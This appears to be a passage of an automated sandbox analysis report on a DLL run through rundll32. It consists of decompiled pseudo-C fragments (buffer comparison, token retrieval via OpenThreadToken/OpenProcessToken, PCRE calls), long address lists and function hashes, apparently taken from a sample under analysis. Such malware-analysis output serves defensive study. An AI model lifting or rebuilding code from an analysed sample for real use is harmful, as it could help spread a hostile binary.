                                                                                                                                                                                                                									if( *(_t162 + 4) == 0) {
                                                                                                                                                                                                                										__eflags = _t235 - _t258;
                                                                                                                                                                                                                										if(_t235 <= _t258) {
                                                                                                                                                                                                                											goto L49;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								__eflags = _t222 - 4;
                                                                                                                                                                                                                								if(_t222 == 4) {
                                                                                                                                                                                                                									goto L46;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						asm("sbb edi, edi");
                                                                                                                                                                                                                						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                                                                						__eflags = _t271;
                                                                                                                                                                                                                						return _t271;
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						__eflags = _t218 - 4;
                                                                                                                                                                                                                						if(_t218 == 4) {
                                                                                                                                                                                                                							goto L34;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							_t173 =  *_t272;
                                                                                                                                                                                                                							__eflags =  *(_t173 + 4);
                                                                                                                                                                                                                							if( *(_t173 + 4) != 0) {
                                                                                                                                                                                                                								goto L34;
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								_t88 = _t272 + 0x5c; // 0x9fe85000
                                                                                                                                                                                                                								__eflags = _t254 -  *_t88;
                                                                                                                                                                                                                								if(_t254 !=  *_t88) {
                                                                                                                                                                                                                									goto L34;
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									return 1;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					return 3;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}






















































                                                                                                                                                                                                                0x10015396
                                                                                                                                                                                                                0x1001539b
                                                                                                                                                                                                                0x1001539f
                                                                                                                                                                                                                0x100153a2
                                                                                                                                                                                                                0x100153a2
                                                                                                                                                                                                                0x100153a5
                                                                                                                                                                                                                0x100153aa
                                                                                                                                                                                                                0x100153af
                                                                                                                                                                                                                0x100153b2
                                                                                                                                                                                                                0x100153b7
                                                                                                                                                                                                                0x100153ba
                                                                                                                                                                                                                0x100153c0
                                                                                                                                                                                                                0x100153c0
                                                                                                                                                                                                                0x100153cb
                                                                                                                                                                                                                0x100153ce
                                                                                                                                                                                                                0x100153d5
                                                                                                                                                                                                                0x100153da
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100153e0
                                                                                                                                                                                                                0x100153e5
                                                                                                                                                                                                                0x100153e5
                                                                                                                                                                                                                0x100153ea
                                                                                                                                                                                                                0x100153f0
                                                                                                                                                                                                                0x100153fa
                                                                                                                                                                                                                0x100153ff
                                                                                                                                                                                                                0x10015405
                                                                                                                                                                                                                0x10015424
                                                                                                                                                                                                                0x10015427
                                                                                                                                                                                                                0x10015432
                                                                                                                                                                                                                0x10015432
                                                                                                                                                                                                                0x10015432
                                                                                                                                                                                                                0x10015429
                                                                                                                                                                                                                0x10015429
                                                                                                                                                                                                                0x1001542b
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1001542d
                                                                                                                                                                                                                0x1001542d
                                                                                                                                                                                                                0x1001542d
                                                                                                                                                                                                                0x1001542b
                                                                                                                                                                                                                0x1001543a
                                                                                                                                                                                                                0x1001543f
                                                                                                                                                                                                                0x10015444
                                                                                                                                                                                                                0x1001544a
                                                                                                                                                                                                                0x1001544e
                                                                                                                                                                                                                0x10015451
                                                                                                                                                                                                                0x10015454
                                                                                                                                                                                                                0x1001545a
                                                                                                                                                                                                                0x1001545f
                                                                                                                                                                                                                0x10015462
                                                                                                                                                                                                                0x10015468
                                                                                                                                                                                                                0x1001546d
                                                                                                                                                                                                                0x10015473
                                                                                                                                                                                                                0x10015479
                                                                                                                                                                                                                0x1001547e
                                                                                                                                                                                                                0x10015481
                                                                                                                                                                                                                0x10015486
                                                                                                                                                                                                                0x1001548a
                                                                                                                                                                                                                0x1001548e
                                                                                                                                                                                                                0x10015491
                                                                                                                                                                                                                0x10015494
                                                                                                                                                                                                                0x1001549d
                                                                                                                                                                                                                0x100154a4
                                                                                                                                                                                                                0x100154a7
                                                                                                                                                                                                                0x100154aa
                                                                                                                                                                                                                0x100154af
                                                                                                                                                                                                                0x100154b4
                                                                                                                                                                                                                0x100154b7
                                                                                                                                                                                                                0x100154ba
                                                                                                                                                                                                                0x100154ba
                                                                                                                                                                                                                0x100154be
                                                                                                                                                                                                                0x100154c7
                                                                                                                                                                                                                0x100154ce
                                                                                                                                                                                                                0x100154d1
                                                                                                                                                                                                                0x100154d6
                                                                                                                                                                                                                0x100154db
                                                                                                                                                                                                                0x100154db
                                                                                                                                                                                                                0x100154de
                                                                                                                                                                                                                0x100154e3
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10015407
                                                                                                                                                                                                                0x10015409
                                                                                                                                                                                                                0x10015416
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10015416
                                                                                                                                                                                                                0x10015409
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10015405
                                                                                                                                                                                                                0x100154e9
                                                                                                                                                                                                                0x100154ee
                                                                                                                                                                                                                0x100154f1
                                                                                                                                                                                                                0x100154f4
                                                                                                                                                                                                                0x1001559f
                                                                                                                                                                                                                0x1001559f
                                                                                                                                                                                                                0x100154fa
                                                                                                                                                                                                                0x100154fa
                                                                                                                                                                                                                0x100154fa
                                                                                                                                                                                                                0x100154ff
                                                                                                                                                                                                                0x10015529
                                                                                                                                                                                                                0x1001552c
                                                                                                                                                                                                                0x1001552c
                                                                                                                                                                                                                0x10015531
                                                                                                                                                                                                                0x10015533
                                                                                                                                                                                                                0x10015535
                                                                                                                                                                                                                0x10015538
                                                                                                                                                                                                                0x1001553b
                                                                                                                                                                                                                0x10015543
                                                                                                                                                                                                                0x10015548
                                                                                                                                                                                                                0x10015548
                                                                                                                                                                                                                0x1001554e
                                                                                                                                                                                                                0x10015551
                                                                                                                                                                                                                0x10015554
                                                                                                                                                                                                                0x10015557
                                                                                                                                                                                                                0x10015559
                                                                                                                                                                                                                0x10015559
                                                                                                                                                                                                                0x1001555a
                                                                                                                                                                                                                0x1001555a
                                                                                                                                                                                                                0x10015557
                                                                                                                                                                                                                0x10015568
                                                                                                                                                                                                                0x1001556b
                                                                                                                                                                                                                0x1001556f
                                                                                                                                                                                                                0x10015574
                                                                                                                                                                                                                0x10015577
                                                                                                                                                                                                                0x1001557a
                                                                                                                                                                                                                0x1001557a
                                                                                                                                                                                                                0x1001557a
                                                                                                                                                                                                                0x1001557d
                                                                                                                                                                                                                0x1001557d
                                                                                                                                                                                                                0x10015580
                                                                                                                                                                                                                0x10015580
                                                                                                                                                                                                                0x10015501
                                                                                                                                                                                                                0x10015501
                                                                                                                                                                                                                0x10015511
                                                                                                                                                                                                                0x10015514
                                                                                                                                                                                                                0x10015519
                                                                                                                                                                                                                0x10015519
                                                                                                                                                                                                                0x1001551c
                                                                                                                                                                                                                0x1001551f
                                                                                                                                                                                                                0x10015522
                                                                                                                                                                                                                0x10015524
                                                                                                                                                                                                                0x10015524
                                                                                                                                                                                                                0x10015583
                                                                                                                                                                                                                0x10015585
                                                                                                                                                                                                                0x10015588
                                                                                                                                                                                                                0x10015588
                                                                                                                                                                                                                0x1001558e
                                                                                                                                                                                                                0x10015592
                                                                                                                                                                                                                0x10015595
                                                                                                                                                                                                                0x10015597
                                                                                                                                                                                                                0x10015597
                                                                                                                                                                                                                0x100155a8
                                                                                                                                                                                                                0x100155aa
                                                                                                                                                                                                                0x100155aa
                                                                                                                                                                                                                0x100155b2
                                                                                                                                                                                                                0x100155c0
                                                                                                                                                                                                                0x100155c3
                                                                                                                                                                                                                0x100155c5
                                                                                                                                                                                                                0x100155e5
                                                                                                                                                                                                                0x100155e5
                                                                                                                                                                                                                0x100155e8
                                                                                                                                                                                                                0x100155ee
                                                                                                                                                                                                                0x100155ef
                                                                                                                                                                                                                0x100155f2
                                                                                                                                                                                                                0x100155f4
                                                                                                                                                                                                                0x100155f7
                                                                                                                                                                                                                0x100155fa
                                                                                                                                                                                                                0x100155fd
                                                                                                                                                                                                                0x10015601
                                                                                                                                                                                                                0x10015604
                                                                                                                                                                                                                0x10015607
                                                                                                                                                                                                                0x1001560a
                                                                                                                                                                                                                0x1001560c
                                                                                                                                                                                                                0x1001560c
                                                                                                                                                                                                                0x1001560f
                                                                                                                                                                                                                0x10015611
                                                                                                                                                                                                                0x10015611
                                                                                                                                                                                                                0x10015614
                                                                                                                                                                                                                0x10015616
                                                                                                                                                                                                                0x10015619
                                                                                                                                                                                                                0x10015621
                                                                                                                                                                                                                0x10015624
                                                                                                                                                                                                                0x10015629
                                                                                                                                                                                                                0x10015629
                                                                                                                                                                                                                0x1001562f
                                                                                                                                                                                                                0x10015632
                                                                                                                                                                                                                0x10015635
                                                                                                                                                                                                                0x10015637
                                                                                                                                                                                                                0x10015637
                                                                                                                                                                                                                0x10015638
                                                                                                                                                                                                                0x10015638
                                                                                                                                                                                                                0x10015643
                                                                                                                                                                                                                0x10015643
                                                                                                                                                                                                                0x10015643
                                                                                                                                                                                                                0x10015646
                                                                                                                                                                                                                0x10015649
                                                                                                                                                                                                                0x10015649
                                                                                                                                                                                                                0x1001564c
                                                                                                                                                                                                                0x1001564c
                                                                                                                                                                                                                0x1001560f
                                                                                                                                                                                                                0x1001564f
                                                                                                                                                                                                                0x10015652
                                                                                                                                                                                                                0x10015655
                                                                                                                                                                                                                0x10015657
                                                                                                                                                                                                                0x1001565a
                                                                                                                                                                                                                0x1001565c
                                                                                                                                                                                                                0x1001565f
                                                                                                                                                                                                                0x10015662
                                                                                                                                                                                                                0x10015664
                                                                                                                                                                                                                0x10015667
                                                                                                                                                                                                                0x1001566f
                                                                                                                                                                                                                0x10015677
                                                                                                                                                                                                                0x1001567a
                                                                                                                                                                                                                0x1001567a
                                                                                                                                                                                                                0x1001567a
                                                                                                                                                                                                                0x1001567d
                                                                                                                                                                                                                0x1001567d
                                                                                                                                                                                                                0x1001567d
                                                                                                                                                                                                                0x10015680
                                                                                                                                                                                                                0x10015686
                                                                                                                                                                                                                0x10015688
                                                                                                                                                                                                                0x10015688
                                                                                                                                                                                                                0x1001568e
                                                                                                                                                                                                                0x10015694
                                                                                                                                                                                                                0x1001569d
                                                                                                                                                                                                                0x100156a4
                                                                                                                                                                                                                0x100156a6
                                                                                                                                                                                                                0x100156a9
                                                                                                                                                                                                                0x100156a9
                                                                                                                                                                                                                0x100156ac
                                                                                                                                                                                                                0x100156ac
                                                                                                                                                                                                                0x100156af
                                                                                                                                                                                                                0x100156b1
                                                                                                                                                                                                                0x100156b4
                                                                                                                                                                                                                0x100156b6
                                                                                                                                                                                                                0x100156d1
                                                                                                                                                                                                                0x100156d1
                                                                                                                                                                                                                0x100156d5
                                                                                                                                                                                                                0x100156d8
                                                                                                                                                                                                                0x100156db
                                                                                                                                                                                                                0x100156de
                                                                                                                                                                                                                0x100156f4
                                                                                                                                                                                                                0x100156f4
                                                                                                                                                                                                                0x100156f4
                                                                                                                                                                                                                0x100156e0
                                                                                                                                                                                                                0x100156e0
                                                                                                                                                                                                                0x100156e2
                                                                                                                                                                                                                0x100156e6
                                                                                                                                                                                                                0x100156e9
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100156eb
                                                                                                                                                                                                                0x100156eb
                                                                                                                                                                                                                0x100156ed
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100156ef
                                                                                                                                                                                                                0x100156ef
                                                                                                                                                                                                                0x100156ef
                                                                                                                                                                                                                0x100156ed
                                                                                                                                                                                                                0x100156e9
                                                                                                                                                                                                                0x100156f8
                                                                                                                                                                                                                0x100156fb
                                                                                                                                                                                                                0x10015700
                                                                                                                                                                                                                0x1001570a
                                                                                                                                                                                                                0x1001570a
                                                                                                                                                                                                                0x1001570a
                                                                                                                                                                                                                0x1001570d
                                                                                                                                                                                                                0x100156b8
                                                                                                                                                                                                                0x100156b8
                                                                                                                                                                                                                0x100156ba
                                                                                                                                                                                                                0x100156c1
                                                                                                                                                                                                                0x100156c1
                                                                                                                                                                                                                0x100156c3
                                                                                                                                                                                                                0x100156c5
                                                                                                                                                                                                                0x100156c7
                                                                                                                                                                                                                0x100156cb
                                                                                                                                                                                                                0x100156cd
                                                                                                                                                                                                                0x100156cf
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100156cf
                                                                                                                                                                                                                0x100156cb
                                                                                                                                                                                                                0x100156bc
                                                                                                                                                                                                                0x100156bc
                                                                                                                                                                                                                0x100156bf
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100156bf
                                                                                                                                                                                                                0x100156ba
                                                                                                                                                                                                                0x10015717
                                                                                                                                                                                                                0x10015719
                                                                                                                                                                                                                0x10015719
                                                                                                                                                                                                                0x10015724
                                                                                                                                                                                                                0x100155c7
                                                                                                                                                                                                                0x100155c7
                                                                                                                                                                                                                0x100155ca
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100155cc
                                                                                                                                                                                                                0x100155cc
                                                                                                                                                                                                                0x100155ce
                                                                                                                                                                                                                0x100155d2
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100155d4
                                                                                                                                                                                                                0x100155d4
                                                                                                                                                                                                                0x100155d4
                                                                                                                                                                                                                0x100155d7
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100155db
                                                                                                                                                                                                                0x100155e4
                                                                                                                                                                                                                0x100155e4
                                                                                                                                                                                                                0x100155d7
                                                                                                                                                                                                                0x100155d2
                                                                                                                                                                                                                0x100155ca
                                                                                                                                                                                                                0x100155b6
                                                                                                                                                                                                                0x100155bf
                                                                                                                                                                                                                0x100155bf

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                                                                                • Opcode ID: a15768640203d689b50e80daa63f56e2f1f27f81ff21523bef836df72f228821
                                                                                                                                                                                                                • Instruction ID: c03aa8aa18d0fbe9ba0a8144e32312481850ad9e2bb41e7d7b69b8a2636fcd53
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a15768640203d689b50e80daa63f56e2f1f27f81ff21523bef836df72f228821
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CD11575A00A00DFC724CF69D8D495AB7E2FF88345B69892DE88ACB751D732F984CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Scre_fullinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3112101106-0
                                                                                                                                                                                                                • Opcode ID: c93dc1a74ea445240d4ae3283a74e48f723b520edb8a2083968d0829e9f80fb9
                                                                                                                                                                                                                • Instruction ID: 2f0f8ac4a6c77a6249221e324dc37063bf8a5fa34516ddaf34cd33c7e9f385e3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c93dc1a74ea445240d4ae3283a74e48f723b520edb8a2083968d0829e9f80fb9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7241C570904219DFCB40CFA9C9447AEBBF0BB48344F10895AE464EB3A4D379D954CF91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E1000E425(void* __ecx) {
                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                				intOrPtr _t13;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                					_t10 = _v8;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					if(GetLastError() != 0x3f0) {
                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                						_t10 = 0;
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						_t13 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x130))(), 8,  &_v8) != 0) {
                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t10;
                                                                                                                                                                                                                			}






                                                                                                                                                                                                                0x1000e444
                                                                                                                                                                                                                0x1000e476
                                                                                                                                                                                                                0x1000e476
                                                                                                                                                                                                                0x1000e446
                                                                                                                                                                                                                0x1000e451
                                                                                                                                                                                                                0x1000e472
                                                                                                                                                                                                                0x1000e472
                                                                                                                                                                                                                0x1000e453
                                                                                                                                                                                                                0x1000e45d
                                                                                                                                                                                                                0x1000e470
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e470
                                                                                                                                                                                                                0x1000e451
                                                                                                                                                                                                                0x1000e47b

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 1000E438
                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E43F
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,1000E56A,00000000,10000000), ref: 1000E446
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E46B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1515895013-0
                                                                                                                                                                                                                • Opcode ID: 4bc0d986f6800a7c46793aa933587504edcea6ea4c041a35c67ee97f7d79fe03
                                                                                                                                                                                                                • Instruction ID: dc40be8b8696f4cd8aae3a846ac2de8cb0550173adfbeab254a65d27bd2c8ac9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bc0d986f6800a7c46793aa933587504edcea6ea4c041a35c67ee97f7d79fe03
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0F01771644656ABFB40DBE48C88B9A77ECFB48390F114450FA82E3061D760EE408B60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Spcre_ord2utf
                                                                                                                                                                                                                • String ID: "$9
                                                                                                                                                                                                                • API String ID: 2386214801-1785012786
                                                                                                                                                                                                                • Opcode ID: 1c102efb01908e3025367ebddb724c30be7ac19a5bebe967fdb5c6f1c95b317a
                                                                                                                                                                                                                • Instruction ID: cac0eb53969d93db26724e6844d53edc3ff5712cee5a533c54c1469f8d48d3a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c102efb01908e3025367ebddb724c30be7ac19a5bebe967fdb5c6f1c95b317a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B012E275A442698FDB60CF28C880B9DBBF1BB4A704F1241E6E858AB351D736DE85CF11
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: )$+
                                                                                                                                                                                                                • API String ID: 0-2508831899
                                                                                                                                                                                                                • Opcode ID: 53bd7514d88783a3749d3b90285573761fe62f8689b182cb6d92a23f7fbe4037
                                                                                                                                                                                                                • Instruction ID: dee43e2518805977d30bcdb0612ec7d7bd44b5426b8b48ecf227347456f986f0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53bd7514d88783a3749d3b90285573761fe62f8689b182cb6d92a23f7fbe4037
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34C1E275A442698FCBA0CF19C880B99BBF1BB4A315F4640E5E8A8EB351D3359EC1DF11
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Spcre_ord2utf
                                                                                                                                                                                                                • String ID: -$-
                                                                                                                                                                                                                • API String ID: 2386214801-2078519666
                                                                                                                                                                                                                • Opcode ID: 9c27036320733e4638026f8ccc566485371b5ac00e94e430021dcdb9fcc3facd
                                                                                                                                                                                                                • Instruction ID: 3e5d8ca9498a0678a438d22df031d9ab7c365247f1d65f927effdcfebb4ea575
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c27036320733e4638026f8ccc566485371b5ac00e94e430021dcdb9fcc3facd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79519B71A04359DFCB20CFA9C484AADBBF1FB49315F14806AE869DB241D339DA95DF10
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
